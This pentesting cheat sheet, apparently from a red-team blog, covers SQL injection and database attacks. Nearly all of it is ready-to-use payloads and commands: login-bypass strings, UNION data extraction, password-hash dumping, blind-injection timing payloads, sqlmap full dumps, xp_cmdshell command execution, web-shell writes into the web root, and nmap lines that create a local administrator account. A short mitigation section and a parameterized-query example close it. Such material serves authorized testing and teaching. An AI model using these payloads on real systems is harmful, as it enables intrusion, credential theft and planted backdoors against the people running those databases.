
SQLDB Pentest

Pivoting for Red Teamers

SQL Database & SQL Injection Pentesting Cheat Sheet

SQL databases hold an application's most sensitive data. Applications that build queries out of untrusted input are vulnerable to SQL Injection (SQLi), and a loosely configured database turns that query-level flaw into file access, command execution and credential theft. This guide covers database enumeration, privilege escalation, and SQL injection techniques.

Step 1: Identifying SQL Database Type

Send test payloads through input fields or URL parameters and watch for error text, version strings or changed behaviour:

' OR 1=1 --     (generic; in MySQL the -- comment only works with a trailing space, or use # instead)
' UNION SELECT 1,2,3 -- (find the column count: add or remove columns until the error disappears)
' AND 1=CONVERT(int,@@version) -- (MSSQL only: the failed conversion error leaks the version banner)

The error messages identify the engine: MySQL answers "You have an error in your SQL syntax", MSSQL "Unclosed quotation mark after the character string", PostgreSQL "unterminated quoted string". Where query output is visible, @@version (MySQL, MSSQL) or version() (PostgreSQL) confirms the guess.

Step 2: Enumerating Database Tables & Columns

Use SQL queries to extract the database structure.

For MySQL:

SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE();  -- Tables in the current database
SELECT column_name FROM information_schema.columns WHERE table_name='users';  -- Columns (add AND table_schema=DATABASE() when the table name exists in several schemas)

For MSSQL:

SELECT name FROM sysobjects WHERE xtype='U';  -- List user tables
SELECT name FROM syscolumns WHERE id=OBJECT_ID('users');  -- List columns

sysobjects and syscolumns are SQL Server 2000 compatibility views; sys.tables and sys.columns are the current catalog views, and the information_schema.tables / information_schema.columns queries above work on both engines.

Step 3: Extracting Data (SQL Injection Exploitation)

Inject SQL payloads into vulnerable parameters to retrieve data. The UNION must return the same number of columns as the original query (Step 1), and the injected columns appear wherever the page renders those positions:

' UNION SELECT username,password FROM users --

When only one column is displayed, collapse the whole table into a single string with a subquery (MySQL; MSSQL 2017+ has STRING_AGG for the same purpose):

' UNION SELECT (SELECT group_concat(username, ':', password) FROM users) --

Step 4: Bypassing Authentication via SQL Injection

Common authentication bypass payloads, entered in the username field (the -- comment needs a trailing space in MySQL; # works there without one):

' OR '1'='1' -- 
' OR '1'='1'#
admin' --

The first two turn the WHERE clause into a tautology, so the first user row is returned; the third comments out the password check for a known username. If the login form is vulnerable, attackers can gain access to admin accounts without knowing a password.

Step 5: Privilege Escalation via SQL Injection

If you can run statements of your choice (stacked queries through the injection point, or a direct connection with stolen credentials), extend or persist access. Neither example below grants rights the current session does not already have: GRANT needs the GRANT OPTION, and xp_cmdshell needs the sysadmin role.

For MySQL:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'newpassword';  -- MySQL 5.x / MariaDB syntax; MySQL 8.0 removed IDENTIFIED BY from GRANT, so CREATE USER first, then GRANT

For MSSQL (if xp_cmdshell is enabled):

EXEC xp_cmdshell 'whoami';  -- Execute system commands as the SQL Server service account

xp_cmdshell is disabled by default; a sysadmin can switch it on with sp_configure ('show advanced options', then 'xp_cmdshell', each followed by RECONFIGURE). Through an injection point all of this requires stacked queries, which MSSQL allows but many MySQL client libraries disable by default.

Step 6: Extracting Hashes from the Database

Retrieve password hashes for offline cracking (hashcat modes 300 for MySQL SHA1 hashes and 1731 for SQL Server 2012 and later):

For MySQL (needs SELECT on the mysql schema):

SELECT user, host, authentication_string FROM mysql.user;  -- MySQL 5.7.6+ and 8.0; older MySQL and MariaDB keep the hash in the password column

For MSSQL (needs high privileges such as CONTROL SERVER or sysadmin to see the hashes):

SELECT name, password_hash FROM sys.sql_logins;

Step 7: Blind SQL Injection

When nothing from the query is echoed back, turn each question into a measurable side effect. Time-based payloads delay the response only when the condition holds:

' OR IF(1=1, SLEEP(5), 0) -- (MySQL; PostgreSQL uses pg_sleep(5))
' OR WAITFOR DELAY '0:0:5' -- (MSSQL)

Replace 1=1 with a condition on the data (for example a comparison against one character of a subquery result) and each request answers one yes/no question. Boolean-based blind injection works the same way, using a visible difference in the page instead of a delay.

Step 8: Using SQLMap for Automated SQL Injection

SQLMap automates detection and exploitation of everything above (add --batch for non-interactive runs):

sqlmap -u "http://example.com/page.php?id=1" --dbs       # enumerate databases
sqlmap -u "http://example.com/page.php?id=1" --dump-all  # dump every table of every database (slow and noisy; -D db -T table --dump is the targeted form)

Step 9: Extracting Files via SQL Injection

Read or write files on the database host.

For MySQL, LOAD_FILE('/path') reads a file into the query result and INTO OUTFILE writes one. Both require the FILE privilege, and the secure_file_priv setting decides whether the target path is allowed (a directory restricts writes to it, NULL disables file operations entirely):

SELECT "" INTO OUTFILE '/var/www/html/shell.php';  -- OUTFILE (write) method; the string literal holds the file content

For MSSQL (Bulk Insert reads the file into a table that must already exist with a matching text column; needs the ADMINISTER BULK OPERATIONS permission, and the service account must be able to read the file):

BULK INSERT mytable FROM 'C:\inetpub\wwwroot\web.config';

Step 10: Web Shell Upload via SQL Injection

If file writing is enabled and the web root is writable by the database service account, write a web shell into it (the string literal carries the shell's source):

SELECT "" INTO OUTFILE '/var/www/html/backdoor.php';

SQL enum with nmap

Service discovery and credential checks against exposed MSSQL (1433/tcp) and MySQL (3306/tcp) instances. The ms-sql-xp-cmdshell lines need valid credentials and xp_cmdshell enabled; the two shown create a local user and add it to the local Administrators group:

nmap -p 1433 --script ms-sql-info --script-args mssql.instance-port=1433 IP_ADDRESS
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user abc abc /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 --script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators abc /add"
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 IP_ADDRESS
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.1

Mitigation Recommendations

  • Use prepared statements (parameterized queries) for every value that comes from a user; identifiers such as column names cannot be bound, so validate those against an allow-list.
  • Run the application under a least-privilege database account: no FILE privilege, no sysadmin role, xp_cmdshell left disabled and secure_file_priv restricted, so an injection cannot become file access or command execution.
  • Use a Web Application Firewall (WAF) as defence in depth, not as the fix; signature filters are routinely bypassed with encoding and comment tricks.
  • Avoid dynamic SQL built by string concatenation, and treat input validation as a second layer rather than the primary control.
  • Keep the database management system patched, and keep verbose database errors off user-facing pages, since they drive the fingerprinting in Step 1.
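An added example (not the post's own code) tying the Step 4 bypass to the first mitigation: the same login query once built by string concatenation and once as a prepared statement, plus the allow-list that is the only option where parameters cannot help. The users table is constructed sample data held in an in-memory SQLite database, and login_vulnerable, login_fixed and list_users are hypothetical names; the sqlite3 placeholder is ?, while MySQLdb and psycopg2 use %s.

```python
import sqlite3


def build_db():
    """Constructed sample backend with one admin and one ordinary user.
    Plaintext passwords only keep the demonstration short; a real
    application stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cr3t!", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Hypothetical login routine that builds SQL by concatenation: the
    target of the Step 4 payloads. Returns (username, role) or None."""
    query = (
        "SELECT username, role FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_fixed(conn, username, password):
    """Same query as a prepared (parameterized) statement: the values travel
    separately from the SQL text, so quotes and comment markers inside them
    are data, never syntax."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


# Identifiers (table or column names, ORDER BY targets) cannot be bound as
# parameters, so the safe pattern for them is a fixed allow-list.
ALLOWED_SORT_COLUMNS = ("username", "role")


def list_users(conn, sort_by):
    """Sort column chosen by the user, accepted only if it is on the list."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column: " + sort_by)
    rows = conn.execute("SELECT username FROM users ORDER BY " + sort_by)
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "admin' -- ", "wrong"))   # bypass: admin row without the password
    print(login_fixed(db, "admin' -- ", "wrong"))        # None: the payload is just an unknown username
```

The tautology payload ' OR '1'='1' -- behaves the same way: against login_vulnerable it returns the first row in the table (usually the administrator created first), against login_fixed it matches nothing.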

Conclusion

SQL injection remains one of the most critical security vulnerabilities. Proper security testing, patching, and mitigation techniques can help protect databases from exploitation.
